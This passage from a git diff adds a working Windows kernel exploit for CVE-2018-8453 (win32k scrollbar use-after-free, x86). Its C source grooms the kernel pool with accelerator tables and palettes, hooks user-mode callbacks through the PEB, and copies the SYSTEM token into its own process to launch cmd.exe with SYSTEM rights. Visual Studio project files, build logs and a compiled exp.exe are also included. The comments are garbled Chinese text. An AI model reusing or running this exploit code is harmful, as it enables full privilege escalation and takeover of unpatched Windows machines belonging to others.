+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size,DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i+=2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i],0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+ free(lpAccel);
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd,NULL,NULL,NULL,FALSE,NULL,NULL,NULL,&stStartUpInfo,&pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg && (*((DWORD*)(*msg)) == (DWORD)hSBWND)) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ //WM_TIMER��ʶScrollBar�Ѿ���ʼѭ��������Ϣ����ǿ���˳�xxxSBTrackLoop;
+ if (*msg && *(msg + 1) == WM_TIMER) {
+ SetCapture(hSBWNDnew);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
+{
+ return DefWindowProc(hWnd, message, wParam, lParam);
+}
+
+int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
+ _In_opt_ HINSTANCE hPrevInstance,
+ _In_ LPWSTR lpCmdLine,
+ _In_ int nCmdShow)
+{
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel= (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wcex;
+ wcex.cbSize = sizeof(WNDCLASSEX);
+ wcex.style = CS_HREDRAW | CS_VREDRAW;
+ wcex.lpfnWndProc = WndProc;
+ wcex.cbClsExtra = 0;
+ wcex.cbWndExtra = 1;
+ wcex.hInstance = hInstance;
+ wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_CVE8453));
+ wcex.hCursor = LoadCursor(nullptr, IDC_ARROW);
+ wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
+ wcex.lpszMenuName = NULL;
+ wcex.lpszClassName = L"WNDCLASSMAIN";
+ wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL));
+
+ RegisterClassExW(&wcex);
+ HACCEL hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_CVE8453));
+
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED , 0, 0, 0, 0,nullptr, nullptr, hInstance, nullptr);
+
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, hInstance, NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮��ijط�ˮ�ᱻ����2������������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x11);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+
+ BeforSBTrackAlloc();
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ return TRUE;
+}
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h
new file mode 100644
index 0000000..d00d47e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h
@@ -0,0 +1,3 @@
+#pragma once
+
+#include "resource.h"
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico
new file mode 100644
index 0000000..b3ec03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc
new file mode 100644
index 0000000..26c47ab
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj
new file mode 100644
index 0000000..830e03d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj
@@ -0,0 +1,173 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}
+ Win32Proj
+ cve8453
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Windows
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters
new file mode 100644
index 0000000..7c753b2
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters
@@ -0,0 +1,55 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 资源文件
+
+
+
+
+ 资源文件
+
+
+ 资源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico
new file mode 100644
index 0000000..b3ec03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp
new file mode 100644
index 0000000..1dc109b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// cve8453.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h
new file mode 100644
index 0000000..8be11dc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h
@@ -0,0 +1,25 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN // �� Windows ͷ���ų�����ʹ�õ�����
+// Windows ͷ�ļ�:
+#include
+
+// C ����ʱͷ�ļ�
+#include
+#include
+#include
+#include
+
+#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // ijЩ CString ���캯��������ʽ��
+
+#include
+#include
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch
new file mode 100644
index 0000000..0a9ee82
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch
new file mode 100644
index 0000000..af45c59
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch
new file mode 100644
index 0000000..2a56886
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo
new file mode 100644
index 0000000..7cd6117
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe
new file mode 100644
index 0000000..af76273
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db
new file mode 100644
index 0000000..be9f0b2
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln
new file mode 100644
index 0000000..12f7ad4
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{28183B36-FF5A-4240-9BBC-60E767FADB82}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.ActiveCfg = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.Build.0 = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.ActiveCfg = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.Build.0 = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.ActiveCfg = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.Build.0 = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.ActiveCfg = Release|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log
new file mode 100644
index 0000000..317b5ab
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\debug\exp.pch
+c:\users\ze0r\desktop\exp\exp\debug\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\debug\vc140.idb
+c:\users\ze0r\desktop\exp\exp\debug\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\debug\exp.obj
+c:\users\ze0r\desktop\exp\debug\exp.ilk
+c:\users\ze0r\desktop\exp\debug\exp.exe
+c:\users\ze0r\desktop\exp\debug\exp.pdb
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log
new file mode 100644
index 0000000..d66af6e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log
@@ -0,0 +1,3 @@
+ exp.cpp
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Debug\exp.exe
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Debug\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj
new file mode 100644
index 0000000..dcb8e37
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch
new file mode 100644
index 0000000..0bcf152
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..5a7107a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..02ec268
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..7714a95
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..84e7425
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|c:\users\ze0r\desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..3ac3afb
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..1c9bcd5
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..d8a9c0e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj
new file mode 100644
index 0000000..8b0f3c4
